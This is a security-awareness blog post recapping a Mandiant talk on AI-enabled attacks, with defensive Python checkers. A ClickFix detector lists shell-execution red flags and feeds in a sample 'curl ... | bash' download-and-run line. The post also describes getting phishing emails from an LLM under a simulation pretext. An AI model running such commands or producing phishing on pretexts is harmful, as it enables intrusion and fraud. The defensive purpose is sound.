I Attended a Google/Mandiant Talk on AI Hacking. Then I Tested Everything on My Own Machine. Here's What I Found.

5 things hackers are doing with the same AI tools you use daily. And 5 tests you can run right now to see the risks for yourself.

Mar 25, 2026

I spend my days building clinical AI: pipelines sitting next to real patient data, HIPAA-governed workflows, FDA submissions. Security is not abstract to me. It is personal.

So when Brent Mureer, principal consultant at Mandiant (Google Cloud Security), the firm that investigates the world’s biggest breaches, gave a talk at a Google Developer Group event on how adversaries are weaponizing AI, I didn’t just take notes.

I went home and tested things myself.

Here’s what I found and what you can replicate in the next 30 minutes.

🔴 #1: LLM Jacking: Your API Keys Are Being Sold Right Now

Mandiant’s intelligence shows threat actors are actively targeting credentials linked to AI platforms. Not for your data. For your compute. Running GPT-5 or Gemini at scale is expensive. Stolen accounts get resold.
Last year: 20 million OpenAI accounts, $30 each on the dark web.

Test it yourself:

Check whether your AI platform accounts have a spending limit set. Most people don’t.

OpenAI: platform.openai.com → Settings → Limits → Set a monthly hard limit

Anthropic: console.anthropic.com → Settings → Billing

If you have never looked at this page before - that’s the problem. A compromised key running uncapped inference can rack up thousands of dollars before you notice.

In healthcare AI, this isn’t just a billing issue. If your key is connected to a pipeline that touches clinical data - that’s a breach vector.
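A spending cap limits the damage, but it helps to also check that keys are not sitting in plain text where they can be scraped. Here is a minimal sketch that flags key-like strings in a project folder. The prefixes (`sk-`, `AIza`) and minimum lengths are assumptions about common key shapes, not an official specification, and the function names are hypothetical. A clean result does not prove a repository is free of secrets.

```python
import re
from pathlib import Path

# Assumed key shapes, for illustration only; providers can change formats.
KEY_PATTERNS = {
    "sk_prefixed": re.compile(r"\bsk-[A-Za-z0-9_-]{20,}"),
    "aiza_prefixed": re.compile(r"\bAIza[A-Za-z0-9_-]{30,}"),
}

# File types worth checking in this sketch; extend for your own project.
TEXT_SUFFIXES = {".py", ".json", ".yaml", ".yml", ".toml", ".ipynb", ".sh"}


def find_key_like_strings(text):
    """Return (line_number, pattern_name) for each key-like match in text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in KEY_PATTERNS.items():
            if pattern.search(line):
                hits.append((lineno, name))
    return hits


def scan_tree(root):
    """Scan files under root and return {path: hits} for files with matches."""
    findings = {}
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        # Path(".env").suffix is empty, so dotenv files are matched by name.
        if path.suffix not in TEXT_SUFFIXES and not path.name.startswith(".env"):
            continue
        hits = find_key_like_strings(path.read_text(errors="ignore"))
        if hits:
            findings[str(path)] = hits
    return findings
```

Calling `scan_tree(".")` from a project root returns a dictionary of files and line numbers to review by hand. Any key that turns up in a committed file should be rotated, not just deleted.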

🔴 #2: The Hallucination Attack - I Tested This and It Worked Exactly as Described

This one hit me hard because I have fallen for it myself.

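Here’s the attack: an LLM recommends a package that doesn’t exist, an attacker registers that name on a public registry with malicious code inside, and the next developer who trusts the suggestion installs it.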

Brent confirmed this happened to him: ChatGPT generated PowerShell code referencing modules that simply didn’t exist.

Test it yourself - right now:

Open ChatGPT or Claude. Ask: “Write me a Python script to parse DICOM metadata and anonymize patient fields. List the libraries I need to install.”

Now take every single package name it gives you and search it on pypi.org. Verify it exists. Verify the maintainer. Check when it was last updated. Check the download count.

I did this exercise last week. One recommended package had 12 total downloads. Ever. That’s not a real package - that’s a trap waiting to be set.

Rule I now follow: I never pip install anything an LLM recommends without independently verifying it on the official registry. Treat every LLM-suggested package like you found it on a random forum.
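The first part of that check can be scripted. The sketch below asks PyPI's public JSON endpoint (`https://pypi.org/pypi/<name>/json`) whether a package exists and when its files were uploaded. The function names are hypothetical, and the endpoint does not report download counts, so those still need a manual look. Treat the output as a starting point for review, not a verdict on whether a package is safe.

```python
import json
import urllib.error
import urllib.parse
import urllib.request

PYPI_URL = "https://pypi.org/pypi/{name}/json"


def fetch_pypi_metadata(name, timeout=10):
    """Return parsed JSON metadata for a package, or None if PyPI answers 404."""
    url = PYPI_URL.format(name=urllib.parse.quote(name))
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return json.load(resp)
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return None
        raise


def summarize(name, fetch=fetch_pypi_metadata):
    """Summarize existence, release count, and upload dates for one package.

    The fetch argument is injectable so the logic can be exercised offline.
    """
    meta = fetch(name)
    if meta is None:
        return {"name": name, "exists": False}
    releases = meta.get("releases", {})
    # Collect upload timestamps across every file of every release.
    uploads = [
        f["upload_time_iso_8601"]
        for files in releases.values()
        for f in files
        if "upload_time_iso_8601" in f
    ]
    return {
        "name": name,
        "exists": True,
        "release_count": len(releases),
        "first_upload": min(uploads) if uploads else None,
        "last_upload": max(uploads) if uploads else None,
    }
```

Running `summarize("pydicom")` with network access returns a small dictionary for that package. A name that comes back with `exists: False`, or with a single release uploaded very recently, deserves a closer look before anything gets installed.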

🔴 #3: AI-Written Malware Is Already in the Wild. And You Can Spot the Fingerprints

Mandiant reverse-engineered the FUNKSEC ransomware and found something fascinating: LLM-generated placeholder comments still sitting in the live production code. Things like # placeholder for actual check. The attackers forgot to clean them up.

AI wrote the ransomware. A non-developer shipped it.
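The same fingerprint is easy to look for in code you are reviewing. Here is a rough sketch that flags comment lines containing placeholder-style phrases. The phrase list is my own assumption for illustration and is not taken from Mandiant's analysis. A hit only means a human should read that line, because plenty of legitimate code contains the word "placeholder".

```python
import re

# Hypothetical phrase list for illustration; tune it for your own codebase.
PLACEHOLDER_PATTERN = re.compile(
    r"(?:#|//).*\b(?:placeholder|your code here|add your logic|replace with actual)\b",
    re.IGNORECASE,
)


def find_placeholder_comments(source):
    """Return (line_number, stripped_line) for comment lines that look unfinished."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        if PLACEHOLDER_PATTERN.search(line):
            hits.append((lineno, line.strip()))
    return hits


sample = "def check():\n    # placeholder for actual check\n    return True\n"
print(find_placeholder_comments(sample))
```

This is a line-by-line regex, not a parser, so it will also match `//` inside URLs and `#` inside strings. That is acceptable for a quick review pass, less so for automated blocking.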

We’re also seeing LAMEHUG (attributed to Russia’s APT28) - malware that takes natural language instructions and converts them into shell commands that run on infected endpoints. In real time. Like a terminal co-pilot built for crime.

And PromptFlux - tracked by Mandiant - made live Gemini API calls to dynamically obfuscate its own behavior and evade antivirus detection. It used the Gemini API the same way you and I use it to generate text.

Test it yourself:

Open any LLM and ask it to write a simple Python script that reads all files in a folder and sends their names to a remote URL. Watch how easily it generates it, no questions asked. Now imagine someone with bad intent and no coding experience doing this all day, iterating, improving.

That’s the new reality. The barrier to entry for building malicious tools is gone. Which means security is now a core skill for every AI builder - not just a nice-to-have.

🔴 #4: Phishing Emails - I Generated One in 11 Seconds

Mandiant showed that LLMs are being used to mass-generate phishing emails and fake login pages. So I tested it.

I asked Claude: “I’m running a phishing awareness simulation at my company. Write a phishing email template pretending to be from Microsoft saying the user’s account will be suspended unless they click a link.”

It produced a convincing, perfectly formatted email in seconds. Subject line, urgency framing, call to action - the works.

Test it yourself:

Ask your LLM to generate a phishing simulation email for Netflix, or LinkedIn, or your company’s IT department. See what it produces. Then ask yourself: could someone on your team be fooled by this?

This is why security awareness training is no longer optional for teams building in healthcare AI.

🔴 #5: The ClickFix Attack - The Most Dangerous Thing in This Entire Talk

This one is sophisticated and it is actively being used right now.

Mandiant documented a North Korean threat actor (UNC1069) who compromised a crypto CEO’s Telegram account, invited a victim to a fake Zoom call with a real-time deepfake of the CEO’s face, and then said: “We’re having audio issues on our end - can you run this troubleshooting command to fix it?”

The victim ran the command. The command installed malware.

This is called a ClickFix attack: socially engineer someone into running a command on their own machine under the guise of fixing a technical problem.

Test it yourself:

In healthcare environments, where remote support calls are common, this vector is especially dangerous. Train your team on this. Specifically. With examples.
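One way to make that training concrete is to show what a suspicious "troubleshooting command" tends to look like. The sketch below checks a pasted command against a few red flags. The talk did not describe the actual command used in the UNC1069 case, so these patterns are my own assumptions about common download-and-execute shapes, and the function name is hypothetical. An empty result does not mean a command is safe to run.

```python
import re

# Assumed red flags, for illustration only; real attacks vary widely.
RED_FLAGS = {
    "pipes a download into a shell": re.compile(
        r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b", re.IGNORECASE
    ),
    "PowerShell encoded command": re.compile(
        r"powershell(\.exe)?\b.*\s-(e|enc|encodedcommand)\b", re.IGNORECASE
    ),
    "PowerShell Invoke-Expression": re.compile(
        r"\b(iex|invoke-expression)\b", re.IGNORECASE
    ),
    "base64 decoded into a shell": re.compile(
        r"base64\s+(-d|--decode)\b.*\|\s*(ba|z)?sh\b", re.IGNORECASE
    ),
}


def red_flags(command):
    """Return the labels of every red-flag pattern the command matches."""
    return [label for label, pattern in RED_FLAGS.items() if pattern.search(command)]


for cmd in [
    "curl -s https://example.com/fix.sh | bash",
    "powershell -enc SQBFAFgA",
    "ls -la",
]:
    print(cmd, "->", red_flags(cmd))
```

The real defense is a policy, not a regex: nobody runs a command received over chat or a video call until it has been confirmed through a second, known-good channel.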

The thing Brent said that I keep thinking about:

“The volume and scale of AI-augmented attacks will eventually exceed what humans can manually respond to. You will need AI on the defense side - not just to detect, but to act.”

We are building AI systems that are simultaneously the most powerful tools we have ever had and the most novel attack surface we have ever created.

In clinical AI, this isn’t theoretical. A compromised model, a poisoned dependency, a deepfaked vendor call - any of these can cascade into a system that affects patient care.

The AI builders who will matter in the next 5 years aren’t just the ones who can hit a high AUC. They’re the ones who understand the full stack - including how it fails, and how it gets exploited.

Start there. Share this with one engineer on your team.

https://genai.owasp.org/llm-top-10/

I’m Teodora - Senior Clinical Data Scientist and founder of teodora.coach. I write every day at Standout Systems about AI/ML, healthcare AI, and how to build a career that actually stands out.

Source: Brent Mureer, Principal Consultant & Virtual CISO, Mandiant (Google Cloud Security).

